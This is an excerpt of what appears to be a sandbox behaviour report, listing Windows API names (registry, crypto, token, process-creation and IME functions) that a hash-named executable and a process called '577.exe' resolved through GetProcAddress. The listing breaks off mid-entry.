\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter _set_error_mode (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ?set_terminate@@YAP6AXXZP6AXXZ@Z (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter _get_terminate (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetLoadedByMscoree (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCLRFunction (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetTraceLoggerHandle (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetTraceEnableLevel (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetTraceEnableFlags (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter TraceEvent (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter IEE (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter IEE_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetStartupFlags (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetStartupFlags_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetHostConfigurationFile (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetHostConfigurationFile_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCORVersion_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCORVersion (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCORSystemDirectory (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetCORSystemDirectory_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetThreadStackGuarantee (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter AddVectoredContinueHandler (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter RemoveVectoredContinueHandler (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ResetWriteWatch (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateMemoryResourceNotification (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter QueryMemoryResourceNotification (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetVersionEx (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetVersionExW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptGenKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptGetKeyParam (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptVerifySignatureA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptSignHashA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptGetProvParam (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptGetUserKey (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersA (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetMetaDataInternalInterface (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetMetaDataInternalInterface_RetAddr (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter UnmapViewOfFile (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetStartupInfo (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateProcess (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter WaitForInputIdle (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter WaitForInputIdleW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00001916)\n \"577.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005100)\n \"577.exe\" called \"GetProcAddress\" with a 